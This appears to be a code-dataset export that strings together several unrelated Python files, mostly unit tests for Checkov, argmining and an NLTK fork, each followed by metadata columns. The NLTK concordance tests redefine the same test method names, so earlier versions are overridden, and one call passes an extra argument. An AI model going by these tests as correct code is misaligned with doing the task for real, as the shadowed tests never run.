all_checks = report.failed_checks + report.passed_checks
self.assertTrue(len(all_checks) > 0) # ensure that the assertions below are going to do something
for record in all_checks:
# no need to join with a '/' because the CFN runner adds it to the start of the file path
self.assertEqual(record.repo_file_path, f'/{dir_rel_path}{record.file_path}')
def test_record_relative_path_with_relative_file(self):
# test whether the record's repo_file_path is correct, relative to the CWD (with a / at the start).
# this is just constructing the scan dir as normal
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_file_path = os.path.join(current_dir, "resources", "success.json")
# this is the relative path to the file to scan (what would actually get passed to the -f arg)
file_rel_path = os.path.relpath(scan_file_path)
runner = Runner()
checks_allowlist = ['CKV_AWS_20']
report = runner.run(root_folder=None, external_checks_dir=None, files=[file_rel_path],
runner_filter=RunnerFilter(framework='cloudformation', checks=checks_allowlist))
all_checks = report.failed_checks + report.passed_checks
self.assertTrue(len(all_checks) > 0) # ensure that the assertions below are going to do something
for record in all_checks:
# no need to join with a '/' because the CFN runner adds it to the start of the file path
self.assertEqual(record.repo_file_path, f'/{file_rel_path}')
def test_record_relative_path_with_abs_file(self):
# test whether the record's repo_file_path is correct, relative to the CWD (with a / at the start).
# this is just constructing the scan dir as normal
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_file_path = os.path.join(current_dir, "resources", "success.json")
file_rel_path = os.path.relpath(scan_file_path)
file_abs_path = os.path.abspath(scan_file_path)
runner = Runner()
checks_allowlist = ['CKV_AWS_20']
report = runner.run(root_folder=None, external_checks_dir=None, files=[file_abs_path],
runner_filter=RunnerFilter(framework='cloudformation', checks=checks_allowlist))
all_checks = report.failed_checks + report.passed_checks
self.assertTrue(len(all_checks) > 0) # ensure that the assertions below are going to do something
for record in all_checks:
# no need to join with a '/' because the CFN runner adds it to the start of the file path
self.assertEqual(record.repo_file_path, f'/{file_rel_path}')
def test_get_tags(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_file_path = os.path.join(current_dir, "resources", "tags.yaml")
definitions, _ = parse(scan_file_path)
resource_name = 'DataBucket'
resource = definitions['Resources'][resource_name]
entity = {resource_name: resource}
entity_tags = cfn_utils.get_resource_tags(entity)
self.assertEqual(len(entity_tags), 4)
tags = {
'Simple': 'Value',
'Name': '${AWS::AccountId}-data',
'Environment': 'long-form-sub-${account}',
'Account': 'long-form-sub-${account}'
}
for name, value in tags.items():
self.assertEqual(entity_tags[name], value)
resource_name = 'NoTags'
resource = definitions['Resources'][resource_name]
entity = {resource_name: resource}
entity_tags = cfn_utils.get_resource_tags(entity)
self.assertIsNone(entity_tags)
'TerraformServerAutoScalingGroup'
resource_name = 'TerraformServerAutoScalingGroup'
resource = definitions['Resources'][resource_name]
entity = {resource_name: resource}
entity_tags = cfn_utils.get_resource_tags(entity)
self.assertIsNone(entity_tags)
resource_name = 'EKSClusterNodegroup'
resource = definitions['Resources'][resource_name]
entity = {resource_name: resource}
entity_tags = cfn_utils.get_resource_tags(entity)
self.assertEqual(len(entity_tags), 1)
tags = {
'Name': '{\'Ref\': \'ClusterName\'}-EKS-{\'Ref\': \'NodeGroupName\'}'
}
for name, value in tags.items():
self.assertEqual(entity_tags[name], value)
def tearDown(self):
pass
if __name__ == '__main__':
unittest.main()
| 42.942675
| 108
| 0.675319
| 886
| 6,742
| 4.887133
| 0.14447
| 0.038799
| 0.025404
| 0.018476
| 0.854965
| 0.854965
| 0.845727
| 0.823326
| 0.816859
| 0.772748
| 0
| 0.002711
| 0.234055
| 6,742
| 156
| 109
| 43.217949
| 0.835786
| 0.202611
| 0
| 0.616162
| 0
| 0
| 0.100243
| 0.036961
| 0
| 0
| 0
| 0
| 0.141414
| 1
| 0.060606
| false
| 0.050505
| 0.060606
| 0
| 0.131313
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
49bb484f4b29afb69b74c05485c40ac6e3222ca3
| 113
|
py
|
Python
|
pre_push.py
|
ralvescosta/iot_mqtt_amqp
|
d54131f04af2c21e4c8a638b10362902e22547aa
|
[
"MIT"
] | 4
|
2021-06-25T11:14:42.000Z
|
2021-12-20T22:02:13.000Z
|
pre_push.py
|
ralvescosta/iot_mqtt_amqp
|
d54131f04af2c21e4c8a638b10362902e22547aa
|
[
"MIT"
] | null | null | null |
pre_push.py
|
ralvescosta/iot_mqtt_amqp
|
d54131f04af2c21e4c8a638b10362902e22547aa
|
[
"MIT"
] | null | null | null |
import os
os.system('cd ./mqtt_bridge && yarn test:staged')
os.system('cd ./iot_consumer && yarn test:staged')
| 22.6
| 50
| 0.699115
| 18
| 113
| 4.277778
| 0.611111
| 0.207792
| 0.25974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123894
| 113
| 5
| 50
| 22.6
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0.640351
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b72a4a4af4a9019e6096e2aee342aa212dbcdda9
| 1,541
|
py
|
Python
|
python/testData/highlighting/fStringTooDeeplyNestedExpressionFragments.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/highlighting/fStringTooDeeplyNestedExpressionFragments.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | null | null | null |
python/testData/highlighting/fStringTooDeeplyNestedExpressionFragments.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | null | null | null |
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{<error descr="Expression expected">}</error></error>}}'
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{<error descr="Expression expected"><error descr="Expression fragments inside f-strings cannot include line comments"># foo}}}'</error></error></error><EOLError descr="Type conversion, ':' or '}' expected"></EOLError><EOLError descr="' expected"></EOLError>
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{z<error descr="An illegal conversion character 'z': should be one of 's', 'r', 'a'">!z</error>}</error>}}'
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{z:<error descr="Expression fragment inside an f-string is nested too deeply">{42}</error>}</error>}}'
f'{<error descr="Expression expected">:</error>{<error descr="Expression expected">:</error><error descr="Expression fragment inside an f-string is nested too deeply">{<error descr="Expression expected">:</error><error descr="Expression fragment inside an f-string is nested too deeply">{<error descr="Expression expected">}</error></error>}</error>}}'
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{z</error><error descr="'}' expected">'</error>
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{z</error><EOLError descr="Type conversion, ':' or '}' expected"></EOLError><EOLError descr="' expected"></EOLError>
| 220.142857
| 352
| 0.724205
| 226
| 1,541
| 4.938053
| 0.163717
| 0.16129
| 0.286738
| 0.225806
| 0.862903
| 0.862903
| 0.862903
| 0.862903
| 0.833333
| 0.833333
| 0
| 0.001426
| 0.089552
| 1,541
| 7
| 353
| 220.142857
| 0.794013
| 0
| 0
| 0
| 0
| 1
| 0.894293
| 0.180285
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
b750feb3ebbdfc5bf09f116c7d6d4bf421358797
| 2,058
|
py
|
Python
|
tests/features/test_polarity_sentiws_polarity_bearing_tokens_feature.py
|
ertogrul/ArgMining
|
2b7777ad6172723ece1cfe8df09c47c5c362ef5d
|
[
"MIT"
] | 13
|
2018-01-26T13:20:53.000Z
|
2022-03-04T15:26:59.000Z
|
tests/features/test_polarity_sentiws_polarity_bearing_tokens_feature.py
|
ertogrul/ArgMining
|
2b7777ad6172723ece1cfe8df09c47c5c362ef5d
|
[
"MIT"
] | null | null | null |
tests/features/test_polarity_sentiws_polarity_bearing_tokens_feature.py
|
ertogrul/ArgMining
|
2b7777ad6172723ece1cfe8df09c47c5c362ef5d
|
[
"MIT"
] | 6
|
2018-04-11T15:27:42.000Z
|
2020-12-10T13:34:06.000Z
|
import unittest
import argmining.features.sentiws_polarity_bearing_tokens_feature as sentiws_polarity_bearing_tokens_feature
from argmining.models.thf_sentence_export import THFSentenceExport
from argmining.models.token import Token
class THFSentenceSentiWSPolarityBearingTokens(unittest.TestCase):
def test_count_polarity_bearing_tokens_example1(self):
tokens = []
tokens.append(Token(1, None, None, None, None, None, None, 0.5))
tokens.append(Token(2, None, None, None, None, None, None, None))
tokens.append(Token(3, None, None, None, None, None, None, 1.5))
thf_sentence = THFSentenceExport(None, None, None, tokens, None, 1)
feature_value = sentiws_polarity_bearing_tokens_feature.count_polarity_bearing_tokens(thf_sentence)
expected_value = [2]
self.assertEqual(feature_value, expected_value)
def test_count_polarity_bearing_tokens_example2(self):
tokens = []
tokens.append(Token(1, None, None, None, None, None, None, None))
tokens.append(Token(2, None, None, None, None, None, None, None))
tokens.append(Token(3, None, None, None, None, None, None, None))
thf_sentence = THFSentenceExport(None, None, None, tokens, None, 1)
feature_value = sentiws_polarity_bearing_tokens_feature.count_polarity_bearing_tokens(thf_sentence)
expected_value = [0]
self.assertEqual(feature_value, expected_value)
def test_count_polarity_bearing_tokens_example3(self):
tokens = []
tokens.append(Token(1, None, None, None, None, None, None, None))
tokens.append(Token(2, None, None, None, None, None, None, -1))
tokens.append(Token(3, None, None, None, None, None, None, -1.5))
thf_sentence = THFSentenceExport(None, None, None, tokens, None, 1)
feature_value = sentiws_polarity_bearing_tokens_feature.count_polarity_bearing_tokens(thf_sentence)
expected_value = [2]
self.assertEqual(feature_value, expected_value)
if __name__ == '__main__':
unittest.main()
| 50.195122
| 108
| 0.720117
| 261
| 2,058
| 5.402299
| 0.153257
| 0.317731
| 0.374468
| 0.363121
| 0.828369
| 0.778723
| 0.755319
| 0.751773
| 0.751773
| 0.751773
| 0
| 0.01481
| 0.179786
| 2,058
| 40
| 109
| 51.45
| 0.820498
| 0
| 0
| 0.529412
| 0
| 0
| 0.003887
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 1
| 0.088235
| false
| 0
| 0.117647
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b754321da784b85474b35adc06891d5a2c5f22ce
| 107
|
py
|
Python
|
test/test_translations.py
|
kinderp/python-package-tutorial
|
9b5b6bc19e75844b6a3119d2621dd1fd63d3c81c
|
[
"MIT"
] | 1
|
2022-02-04T18:10:04.000Z
|
2022-02-04T18:10:04.000Z
|
test/test_translations.py
|
kinderp/python-package-tutorial
|
9b5b6bc19e75844b6a3119d2621dd1fd63d3c81c
|
[
"MIT"
] | null | null | null |
test/test_translations.py
|
kinderp/python-package-tutorial
|
9b5b6bc19e75844b6a3119d2621dd1fd63d3c81c
|
[
"MIT"
] | null | null | null |
from imppkg.say import main
from imppkg.hello import say_hello
def test_always_passed():
assert True
| 15.285714
| 34
| 0.785047
| 17
| 107
| 4.764706
| 0.705882
| 0.246914
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168224
| 107
| 6
| 35
| 17.833333
| 0.910112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
b7a7cf13eac4440a30a8250ff7fa9edeb54bd5b5
| 31,536
|
py
|
Python
|
nltkma/test/unit/test_concordance.py
|
aydtmiri/nltk-ma
|
5d7dd01844ee063fc910a648948624b6a2dddaf9
|
[
"Apache-2.0"
] | null | null | null |
nltkma/test/unit/test_concordance.py
|
aydtmiri/nltk-ma
|
5d7dd01844ee063fc910a648948624b6a2dddaf9
|
[
"Apache-2.0"
] | null | null | null |
nltkma/test/unit/test_concordance.py
|
aydtmiri/nltk-ma
|
5d7dd01844ee063fc910a648948624b6a2dddaf9
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from io import StringIO
from nltkma.text import find_concordance
from nltkma.collocations import BigramCollocationFinder, BigramAssocMeasures
class TestConcordance(unittest.TestCase):
"""Text constructed using: http://www.nltk.org/book/ch01.html"""
def test_concordance_list_1(self):
corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text', 'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood', 'minority',
',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material', '.',
'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
corpus_token_cleaned = ['Traditionally', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text',
'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
'minority',
'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material', 'in',
'its',
'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
pivot_token = ['minority']
target_token = ['asian']
result = find_concordance(pivot_token, target_token, (3, 3), (1, 10), corpus_token, corpus_token_cleaned, True,
True, False)
expected_line = 'Asian BAME Asian understood minority , asian to be a ,piece of written or spoken material .'
expected_left_line = 'BAME Asian understood'
expected_left_context = 'Asian'
expected_right_line = ', asian to be'
expected_right_context = 'a ,piece of written or spoken material .'
expected_query = 'minority'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
def test_concordance_list_2(self):
corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text',
'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
'minority',
',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material',
'.',
'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
corpus_token_cleaned = ['Traditionally', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a',
'text',
'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
'minority',
'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material',
'in',
'its',
'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
pivot_token = ['minority']
target_token = ['asian']
result = find_concordance(pivot_token, target_token, (3, 3), (1, 10), corpus_token, corpus_token_cleaned,
True,
False,
False)
expected_line = 'Asian BAME Asian understood minority , asian to be a ,piece of written or spoken material . ' \
'in its primary'
expected_left_line = 'BAME Asian understood'
expected_left_context = 'Asian'
expected_right_line = ', asian to be'
expected_right_context = 'a ,piece of written or spoken material . in its primary'
expected_query = 'minority'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
def test_concordance_list_3(self):
corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text',
'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
'minority',
',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material',
'.',
'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
corpus_token_cleaned = ['Traditionally', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a',
'text',
'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
'minority',
'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material',
'in',
'its',
'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
pivot_token = []
target_token = []
result = find_concordance(pivot_token, target_token, (3, 3), (1, 10), corpus_token, corpus_token_cleaned,
True,
False,
False)
expected = []
assert expected == result
def test_concordance_list_4(self):
corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text',
'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
'minority',
',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material',
'.',
'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
corpus_token_cleaned = ['Traditionally', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a',
'text',
'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
'minority',
'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material',
'in',
'its',
'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
pivot_token = ['minority']
target_token = ['Asian']
actual = find_concordance(pivot_token, target_token, (1, 1), (1, 10), corpus_token, corpus_token_cleaned,
True,
False,
False)
expected = []
assert expected == actual
def test_concordance_list_1(self):
corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text', 'is',
'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood', 'minority',
',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material', '.',
'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
corpus_token_cleaned = ['traditionally', 'black', 'black', 'asians', 'blacks', 'blacks', 'bame', 'a', 'text',
'is',
'bame', 'asian', 'bAME', 'asian', 'bAME', 'asian', 'bame', 'asian', 'understood',
'minority',
'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material', 'in',
'its',
'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
pivot_token = ['minority']
target_token = ['asian']
result = find_concordance(pivot_token, target_token, (3, 3), (1, 10), corpus_token, corpus_token_cleaned, True,
True, True)
expected_line = 'Asian BAME Asian understood minority , asian to be a ,piece of written or spoken material .'
expected_left_line = 'BAME Asian understood'
expected_left_context = 'Asian'
expected_right_line = ', asian to be'
expected_right_context = 'a ,piece of written or spoken material .'
expected_query = 'minority'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
def test_concordance_list_5(self):
corpus_token = ['Hi','!', 'I', 'am', 'black', 'and', 'I', 'am', 'going', 'to', 'get', 'the', 'vaccine', 'next',
'week', '.', 'Black', 'and', 'vaccine', '=', 'love', '.', 'That', 'is', 'all', 'I', 'am',
'going', 'to', 'say', '!']
corpus_token_cleaned = ['Hi', 'I', 'am', 'black', 'and', 'I', 'am', 'going', 'to', 'get', 'the', 'vaccine',
'next', 'week', 'Black', 'and', 'vaccine', 'love', 'That', 'is', 'all', 'I', 'am',
'going', 'to', 'say']
pivot_token = ['vaccine']
target_token = ['Black']
result = find_concordance(pivot_token, target_token, (100, 100), (2, 2), corpus_token, corpus_token_cleaned, True,
True, False)
expected_line = ' Hi ! I am black and I am going to get the vaccine next week . '
expected_left_line = 'Hi ! I am black and I am going to get the'
expected_left_context = ''
expected_right_line = 'next week .'
expected_right_context = ' '
expected_query = 'vaccine'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
def test_concordance_list_6(self):
corpus_token = ['Hi','!', 'I', 'am', 'black', 'and', 'I', 'am', 'going', 'to', 'get', 'the', 'vaccine', 'next',
'week', '.', 'Black', 'and', 'vaccine', '=', 'love', '.', 'That', 'is', 'all', 'I', 'am',
'going', 'to', 'say', '!']
corpus_token_cleaned = ['Hi', 'I', 'am', 'black', 'and', 'I', 'am', 'going', 'to', 'get', 'the', 'vaccine',
'next', 'week', 'Black', 'and', 'vaccine', 'love', 'That', 'is', 'all', 'I', 'am',
'going', 'to', 'say']
pivot_token = ['vaccine']
target_token = ['black']
result = find_concordance(pivot_token, target_token, (10, 3), (100, 100), corpus_token, corpus_token_cleaned, True,
False, False)
expected_line = 'Hi ! I am black and I am going to get the vaccine next week . Black and vaccine = love . That is all I am going to say !'
expected_left_line = 'I am black and I am going to get the'
expected_left_context = 'Hi !'
expected_right_line = 'next week . Black'
expected_right_context = 'and vaccine = love . That is all I am going to say !'
expected_query = 'vaccine'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
def test_concordance_list_6(self):
corpus_token = ['There', 'have', 'been', '20', 'presidents', 'of', 'the', 'University', 'of', 'Illinois', 'system', ',', 'a', 'system', 'of', 'public', 'universities', 'in', 'the', 'U', '.', 'S', '.', 'state', 'of', 'Illinois', '.', 'The', 'president', 'is', 'the', 'chief', 'executive', 'officer', 'and', 'a', 'faculty', 'member', 'of', 'each', 'of', 'its', 'colleges', ',', 'schools', ',', 'institutions', ',', 'and', 'divisions', '.', 'Elected', 'by', 'the', 'board', 'of', 'trustees', ',', 'the', 'president', 'is', 'responsible', 'to', 'them', 'for', 'the', 'operation', 'of', 'the', 'system', 'by', 'preparing', 'budgets', ',', 'recommending', 'persons', 'for', 'appointment', 'to', 'university', 'positions', ',', 'and', 'enforcing', 'of', 'the', 'rules', 'and', 'regulations', 'of', 'the', 'universities', '.', 'Following', 'the', 'establishment', 'of', 'the', 'office', 'in', '1867', ',', 'John', 'Milton', 'Gregory', 'served', 'as', 'the', 'first', 'president', ',', 'originally', 'titled', '&', 'quot', ';', 'regent', '&', 'quot', ';', '.', 'Three', 'presidents', ',', 'Lloyd', 'Morey', ',', 'James', 'J', '.', 'Stukel', ',', 'and', 'Robert', 'A', '.', 'Easter', ',', 'are', 'alumni', 'of', 'the', 'University', 'of', 'Illinois', 'Urbana', '-', 'Champaign', '.', 'The', 'current', 'president', 'is', 'Timothy', 'L', '.', 'Killeen', ',', 'who', 'has', 'held', 'the', 'position', 'since', '2015', '.']
corpus_token_cleaned = ['There', 'have', 'been', '20', 'presidents', 'of', 'the', 'University', 'of', 'Illinois', 'system', 'a', 'system', 'of', 'public', 'universities', 'in', 'the', 'U', 'S', 'state', 'of', 'Illinois', 'The', 'president', 'is', 'the', 'chief', 'executive', 'officer', 'and', 'a', 'faculty', 'member', 'of', 'each', 'of', 'its', 'colleges','schools', 'institutions', 'and', 'divisions','Elected', 'by', 'the', 'board', 'of', 'trustees', 'the', 'president', 'is', 'responsible', 'to', 'them', 'for', 'the', 'operation', 'of', 'the', 'system', 'by', 'preparing', 'budgets', 'recommending', 'persons', 'for', 'appointment', 'to', 'university', 'positions', 'and', 'enforcing', 'of', 'the', 'rules', 'and', 'regulations', 'of', 'the', 'universities', 'Following', 'the', 'establishment', 'of', 'the', 'office', 'in', '1867', 'John', 'Milton', 'Gregory', 'served', 'as', 'the', 'first', 'president', 'originally', 'titled', 'quot', 'regent', 'quot','Three', 'presidents','Lloyd', 'Morey', 'James', 'J', 'Stukel','and', 'Robert', 'A', 'Easter', 'are', 'alumni', 'of', 'the', 'University', 'of', 'Illinois', 'Urbana', 'Champaign', 'The', 'current', 'president', 'is', 'Timothy', 'L','Killeen', 'who', 'has', 'held', 'the', 'position', 'since', '2015']
pivot_token = ['University']
target_token = ['Illinois']
result = find_concordance(pivot_token, target_token, (10, 3), (1, 2), corpus_token, corpus_token_cleaned,corpus_token_cleaned, True,
False, False)
expected_line = ' There have been 20 presidents of the University of Illinois system , a system'
expected_left_line = 'There have been 20 presidents of the'
expected_left_context = ''
expected_right_line = 'of Illinois system ,'
expected_right_context = 'a system'
expected_query = 'University'
assert expected_line == result[0].line
assert expected_left_context == result[0].left_context
assert expected_left_line == result[0].left_span
assert expected_query == result[0].query
assert expected_right_line == result[0].right_span
assert expected_right_context == result[0].right_context
def test_concordance_list_6(self):
corpus_token = ['The', 'Gurian', 'Republic', 'was', 'an', 'insurrection', 'and', 'protest', 'movement', 'in', 'the', 'western', 'Georgian', 'region', 'of', 'Guria', 'between', '1902', 'and', '1906', ',', 'against', 'the', 'Russian', 'Empire', '.', 'It', 'arose', 'from', 'a', 'revolt', 'over', 'land', 'grazing', 'rights', ';', 'taxation', ',', 'land', 'ownership', 'and', 'economic', 'factors', 'were', 'also', 'concerns', '.', 'The', 'Republic', 'established', 'its', 'own', 'system', 'of', 'government', ',', 'although', 'it', 'was', 'not', 'anti', '-', 'Russian', ',', 'desiring', 'to', 'remain', 'within', 'the', 'Empire', '.', 'The', '1905', 'Russian', 'Revolution', 'led', 'to', 'uprisings', 'throughout', 'the', 'Empire', ',', 'including', 'Georgia', ',', 'and', 'in', 'reaction', 'the', 'imperial', 'authorities', 'deployed', 'the', 'military', 'to', 'end', 'the', 'rebellions', '.', 'The', 'peasants', 'were', 'able', 'to', 'fend', 'off', 'a', 'small', 'force', 'of', 'Cossacks', ',', 'but', 'overwhelming', 'military', 'force', 'was', 'used', 'to', 're', '-', 'assert', 'control', 'in', '1906', '.', 'Some', 'of', 'the', 'Republic', '&', '#', 'x27', ';', 's', 'leaders', 'were', 'executed', ',', 'imprisoned', 'or', 'exiled', ',', 'but', 'others', 'later', 'played', 'prominent', 'roles', 'in', 'the', '1918', '–', '1921', 'Democratic', 'Republic', 'of', 'Georgia', '.', 'The', 'Gurian', 'Republic', 'demonstrated', 'that', 'peasants', 'could', 'participate', 'in', 'the', 'socialist', 'movement', ',', 'an', 'idea', 'previously', 'downplayed', 'by', 'leading', 'Marxists', '.']
corpus_token_cleaned = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
corpus_wo_stamming = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 